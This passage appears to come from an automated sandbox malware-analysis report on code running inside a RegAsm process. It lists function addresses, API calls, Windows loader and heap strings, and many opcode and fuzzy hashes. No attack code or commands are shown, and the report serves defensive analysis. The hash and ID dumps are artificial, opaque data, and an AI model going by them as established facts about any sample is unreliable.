                                                                                          • Opcode Fuzzy Hash: f2dec7003d1bade49adf7a2960007ee76a3fed89c1568b0ec281b0a8c128e07e
                                                                                          • Instruction Fuzzy Hash: 2A90023162551802D104B1584514706100587D0201F65C411A1424568D87D68A9166A2
                                                                                          Function 03232B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 125 3232b60-3232b6c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 24bd1a9ecb494db3b060b71e68c2739a0440a7002c1f6b2c7e1328b900fd902f
                                                                                          • Instruction ID: 152321741b8072984678c2d3d3e22945bc58eedbaffc3328b154581ca625c167
                                                                                          • Opcode Fuzzy Hash: 24bd1a9ecb494db3b060b71e68c2739a0440a7002c1f6b2c7e1328b900fd902f
                                                                                          • Instruction Fuzzy Hash: F9900261222414034109B1584414616400A87E0201B55C021E2014590DC66689D16225
                                                                                          Function 03232DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 127 3232df0-3232dfc LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 4f50433abaed801e09fcc066f4c4303d140814ae06056ab763e780314e0cb924
                                                                                          • Instruction ID: e8a52342da182640129c327be44497fe0bd5ba5c3ff16741192867f515d9e274
                                                                                          • Opcode Fuzzy Hash: 4f50433abaed801e09fcc066f4c4303d140814ae06056ab763e780314e0cb924
                                                                                          • Instruction Fuzzy Hash: FD90023122141813D115B1584504707000987D0241F95C412A1424558D97978A92A221
                                                                                          Function 03232C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 126 3232c70-3232c7c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: c27f3ab6ddc26a566a555caf70aba605a8680199d17fc7856f52c78420de124f
                                                                                          • Instruction ID: 346c9a4c5ac8e3764376a4fb6eac45499a1087bcdd077dc6039305a39073e8c9
                                                                                          • Opcode Fuzzy Hash: c27f3ab6ddc26a566a555caf70aba605a8680199d17fc7856f52c78420de124f
                                                                                          • Instruction Fuzzy Hash: 2990023122149C02D114B158840474A000587D0301F59C411A5424658D87D689D17221
                                                                                          Function 00418B73 Relevance: .4, Instructions: 435COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8fcb109f2c4afc3a320afe7d5f632a4b7bba5e1fb93420e67ca1dc9ef5ea420
                                                                                          • Instruction ID: 3c7eace3fbeb3ab042efb41f96bae54f90be9853bbcfb43cc2176bdf88b693d1
                                                                                          • Opcode Fuzzy Hash: c8fcb109f2c4afc3a320afe7d5f632a4b7bba5e1fb93420e67ca1dc9ef5ea420
                                                                                          • Instruction Fuzzy Hash: FEF19170D00219AFDB24DF64CC85AEEB7B9AF44304F1481AEE509A7341DB785A85CF99
                                                                                          Function 0041450E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(356hF-43,00000111,00000000,00000000), ref: 004145EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 356hF-43$356hF-43
                                                                                          • API String ID: 1836367815-652967417
                                                                                          • Opcode ID: 9609dfd2ad81e4ddf48348109b3ec9b3a5db958a341f26f330ea0ed12f989812
                                                                                          • Instruction ID: 9803c138016e68be3a75ed28d1af3355042f0d91baea2625d9bd2d0005346577
                                                                                          • Opcode Fuzzy Hash: 9609dfd2ad81e4ddf48348109b3ec9b3a5db958a341f26f330ea0ed12f989812
                                                                                          • Instruction Fuzzy Hash: 3F219732D0520CBFDB108BA59C429EEBBB8EF81328B40419EF904AB181D73849468BA5
                                                                                          Function 00414569 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(356hF-43,00000111,00000000,00000000), ref: 004145EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 356hF-43$356hF-43
                                                                                          • API String ID: 1836367815-652967417
                                                                                          • Opcode ID: daab2429e4d0e4b3698bb5e1be9ba60fbf1b0c666f40e5968915922b539ebacf
                                                                                          • Instruction ID: 36a963063cd34cdd03d5adc4409d2fbc65ab0152f832fc2848fc3030f7e9bb71
                                                                                          • Opcode Fuzzy Hash: daab2429e4d0e4b3698bb5e1be9ba60fbf1b0c666f40e5968915922b539ebacf
                                                                                          • Instruction Fuzzy Hash: 9C11E772D0521C7BDB109AA59C82DEFBB7CEF41758F44416EFA04A7140E6784E0547E5
                                                                                          Function 00414573 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(356hF-43,00000111,00000000,00000000), ref: 004145EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: 356hF-43$356hF-43
                                                                                          • API String ID: 1836367815-652967417
                                                                                          • Opcode ID: e3bc11c0d69347411ef10ad920427fcf79a638e3df724f09dea6fabac719008d
                                                                                          • Instruction ID: 7280d65a2121f0f31840ae6fe7f2d095e500adeebbc0a88ddb2045927215b848
                                                                                          • Opcode Fuzzy Hash: e3bc11c0d69347411ef10ad920427fcf79a638e3df724f09dea6fabac719008d
                                                                                          • Instruction Fuzzy Hash: 6401C472D0521C7AEB10AAE59C82DEFBB7CDF41798F408069FA14B7141D6784E068BF6
                                                                                          Function 0042D023 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 59 42d023-42d064 call 404863 call 42dee3 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFFFFFF,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042D05F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: njA
                                                                                          • API String ID: 3298025750-599903507
                                                                                          • Opcode ID: 380cc8a66a0ddd4e97a18d4d7393084095f92b265ae39b2e8a2fa984ff5e95fd
                                                                                          • Instruction ID: 16bd54cf0654115adc5c6fdf1fe4d550312ac3b3fe09a85d7813fcdffa1b9860
                                                                                          • Opcode Fuzzy Hash: 380cc8a66a0ddd4e97a18d4d7393084095f92b265ae39b2e8a2fa984ff5e95fd
                                                                                          • Instruction Fuzzy Hash: 11E092722002047FC710EE99EC81FAB37ACEFC8714F004419FA08A7282C671B910C7B8
                                                                                          Function 0042CFD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 106 42cfd3-42d014 call 404863 call 42dee3 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041EABE,?,?,00000000,?,0041EABE,?,?,?), ref: 0042D00F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 83e285552162d547b5f22e7a68ef2a5700ee52688da7e9c4a6e6ddded795aa6f
                                                                                          • Instruction ID: d1800c1d9cfa135d941f7c821164ad2ccc76bdda6affe71de9d1770dadc097ea
                                                                                          • Opcode Fuzzy Hash: 83e285552162d547b5f22e7a68ef2a5700ee52688da7e9c4a6e6ddded795aa6f
                                                                                          • Instruction Fuzzy Hash: D2E06D726002047BD610EE99EC45E9B33ACEFC8710F004819F908A7242D670B9108BB4
                                                                                          Function 0042D073 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 116 42d073-42d0ac call 404863 call 42dee3 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,D09FCD01,?,?,D09FCD01), ref: 0042D0A7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2480621841.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: de1b1657957d45144ca97389a2b7162c39fac3e0009b6050fc8359cc32d7ff78
                                                                                          • Instruction ID: 8478c74dd66396e0bd1a6f618ac7652aa4d4f7a898eaeee8c9047f393c764431
                                                                                          • Opcode Fuzzy Hash: de1b1657957d45144ca97389a2b7162c39fac3e0009b6050fc8359cc32d7ff78
                                                                                          • Instruction Fuzzy Hash: 2AE04F362106147BD210FA5ADC41F97775CDBC5725F414819FA08A7241C671B911C7F4
                                                                                          Function 03232C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 121 3232c0a-3232c0f 122 3232c11-3232c18 121->122 123 3232c1f-3232c26 LdrInitializeThunk 121->123
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 5bc24c39b2dcda3b6f37ab79d09139fefa448f641c1265680b504830ce36577c
                                                                                          • Instruction ID: 0f628b890d17b45f831cdc357b58d96bca79f8221d8a98459fa25c59e681a134
                                                                                          • Opcode Fuzzy Hash: 5bc24c39b2dcda3b6f37ab79d09139fefa448f641c1265680b504830ce36577c
                                                                                          • Instruction Fuzzy Hash: 64B09B719115D5C5DA15F7604608717790467D1701F1AC461D3030741F4779D1D1E275

                                                                                          Non-executed Functions

                                                                                          Function 03272349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2160512332
                                                                                          • Opcode ID: 4ecd92d9775583603de39c943b580a5a360c33d72db3a518259e71d1dbd3aaef
                                                                                          • Instruction ID: 53f81b3f86dcc9d3f90255ae1f61574547605119b344bd428c73f4107b5ca987
                                                                                          • Opcode Fuzzy Hash: 4ecd92d9775583603de39c943b580a5a360c33d72db3a518259e71d1dbd3aaef
                                                                                          • Instruction Fuzzy Hash: 78927E75624742EFD720DE24C881B6BB7E8BB88754F184D1DFA94DB250D7B0E884CB92
                                                                                          Function 031E68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-3089669407
                                                                                          • Opcode ID: 36ec7b308c02bec66ec89e51b098931314692a7d8397a24fa1cea68bdc02dab2
                                                                                          • Instruction ID: 962ab4875a16ea5b6989bd6b28be403483b6084950d849b9d76cdc7e7a41961e
                                                                                          • Opcode Fuzzy Hash: 36ec7b308c02bec66ec89e51b098931314692a7d8397a24fa1cea68bdc02dab2
                                                                                          • Instruction Fuzzy Hash: F08151B2D21618BFCB12FAE4EDD5EDFB7BDAB096107144522B910FB100E765ED448BA0
                                                                                          Function 03228620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • double initialized or corrupted critical section, xrefs: 03265508
                                                                                          • Thread identifier, xrefs: 0326553A
                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 03265543
                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032654CE
                                                                                          • corrupted critical section, xrefs: 032654C2
                                                                                          • Critical section address, xrefs: 03265425, 032654BC, 03265534
                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0326540A, 03265496, 03265519
                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 032654E2
                                                                                          • Invalid debug info address of this critical section, xrefs: 032654B6
                                                                                          • Critical section address., xrefs: 03265502
                                                                                          • Address of the debug info found in the active list., xrefs: 032654AE, 032654FA
                                                                                          • undeleted critical section in freed memory, xrefs: 0326542B
                                                                                          • 8, xrefs: 032652E3
                                                                                          • Critical section debug info address, xrefs: 0326541F, 0326552E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                          • API String ID: 0-2368682639
                                                                                          • Opcode ID: c7c04815d4f2fd665158d4719ef77f0407ab0a686b285fdd7ddc84a92f6b0e2b
                                                                                          • Instruction ID: 8c71e54e04daaa30f6f35b0a8ea5d5b1c1cd62762c13e2b3f5ea8865c319176d
                                                                                          • Opcode Fuzzy Hash: c7c04815d4f2fd665158d4719ef77f0407ab0a686b285fdd7ddc84a92f6b0e2b
                                                                                          • Instruction Fuzzy Hash: 1881BCB0A10359FFDB20CF95C845FAEBBB9BF4AB00F244159E518BB641C3B5A881CB50
                                                                                          Function 03220F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                          • API String ID: 0-360209818
                                                                                          • Opcode ID: c7c602275d207a0a31a7b16fb4a1a35f1194ffc081706a8bb27e1113ed4efabb
                                                                                          • Instruction ID: b39ef24626fb958cf1cfa791a67e5623d068f71da6ef0aad8b26c4126baa3984
                                                                                          • Opcode Fuzzy Hash: c7c602275d207a0a31a7b16fb4a1a35f1194ffc081706a8bb27e1113ed4efabb
                                                                                          • Instruction Fuzzy Hash: 5B6283B5E202259FDB24CF18CC41BA9B7B6AF95310F5882DAD449AB240D7727EE1CF50
                                                                                          Function 032A12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                          • API String ID: 0-3591852110
                                                                                          • Opcode ID: b186d2b1087de7c80358fbd210eb7c239c35ad71cdea99276bad186536536e09
                                                                                          • Instruction ID: 08dfe944818c87d944bdaa9cbc88eb7d9cea30342fe7a06ceb9a1696ed9dbbaa
                                                                                          • Opcode Fuzzy Hash: b186d2b1087de7c80358fbd210eb7c239c35ad71cdea99276bad186536536e09
                                                                                          • Instruction Fuzzy Hash: 8F129B34624A42DFD725CF2DC441BBABBF6EF09725F088499E4968B682D774F890CB50
                                                                                          Function 0320AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-3197712848
                                                                                          • Opcode ID: 511d6375139fdbb4d7900a0758b55197c57502b0eb136c1cd47026685730cdaf
                                                                                          • Instruction ID: 91215a3f614f1302a7c0d1390328cc03940b8efd81b7c01ba9cf172a796d063c
                                                                                          • Opcode Fuzzy Hash: 511d6375139fdbb4d7900a0758b55197c57502b0eb136c1cd47026685730cdaf
                                                                                          • Instruction Fuzzy Hash: 61120671A283429FD324DF18C445BAAB7E5BF84704F48495DF9858B2C2E7B4D988CB92
                                                                                          Function 031ED34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                          • API String ID: 0-3532704233
                                                                                          • Opcode ID: 000bea185723c41cc5e2fcfc48dee25fcbb8152a175df13cceaabfa381d11479
                                                                                          • Instruction ID: 2b62549efcfba306af44f89fc187ad9b6de85c9024a2f561e3e741caaa03eed8
                                                                                          • Opcode Fuzzy Hash: 000bea185723c41cc5e2fcfc48dee25fcbb8152a175df13cceaabfa381d11479
                                                                                          • Instruction Fuzzy Hash: A6B1BBB25187519FC725DF24D880B6BF7E8AF88704F09492EF899DB240D771D988CB92
                                                                                          Function 032A0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          • Opcode ID: 6d3a0e24fe6f31f0ae1fa7bcd72489234523e65132368cfce19df7d435617554
                                                                                          • Instruction ID: 41b479bdb452452913f6c138756ec9a5b1c458e1a64d135004296b544a0c6d45
                                                                                          • Opcode Fuzzy Hash: 6d3a0e24fe6f31f0ae1fa7bcd72489234523e65132368cfce19df7d435617554
                                                                                          • Instruction Fuzzy Hash: B3F1F235A24A96EFCB25CF6CC440BAAF7F5FF09714F088059E4919B242C774B985DB90
                                                                                          Function 03289179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                          • API String ID: 0-3063724069
                                                                                          • Opcode ID: 1c54096579180dac9324af8366cdc7cb37b4d9deaf7df15296071513138a5f1a
                                                                                          • Instruction ID: 666cbb1211ccc867be6ba12e33c3de8c5041a3a974b94831793c2fb67b767778
                                                                                          • Opcode Fuzzy Hash: 1c54096579180dac9324af8366cdc7cb37b4d9deaf7df15296071513138a5f1a
                                                                                          • Instruction Fuzzy Hash: CDD1F6B2826321AFD721EF54C840B7FF7E8AF85714F044929FA94AB190D7B4D9C48792
                                                                                          Function 032A0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                          • API String ID: 0-1700792311
                                                                                          • Opcode ID: 957d54336f66e878210743026a986c760eecb5e5097d2dc262eafb00cfb847b1
                                                                                          • Instruction ID: a6c6c587bfce571d4476e9e5a8936f6ea18d1b564ad5a184777d7725cfd64778
                                                                                          • Opcode Fuzzy Hash: 957d54336f66e878210743026a986c760eecb5e5097d2dc262eafb00cfb847b1
                                                                                          • Instruction Fuzzy Hash: C9D1DC39A24B86DFCB11EF68C441AADFBF2FF4A704F08C049E4559B252C775A981CB50
                                                                                          Function 031ED08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 031ED2C3
                                                                                          • @, xrefs: 031ED313
                                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 031ED0CF
                                                                                          • @, xrefs: 031ED2AF
                                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 031ED146
                                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 031ED196
                                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 031ED262
                                                                                          • @, xrefs: 031ED0FD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                          • API String ID: 0-1356375266
                                                                                          • Opcode ID: 72831af46333423396353486b35c214e2bc694ba0f70842caeeb0992dfa8db43
                                                                                          • Instruction ID: ce4c077a8f8635017fd046a7a7e13ba5f58f965725e5ce20888f12e3368d5779
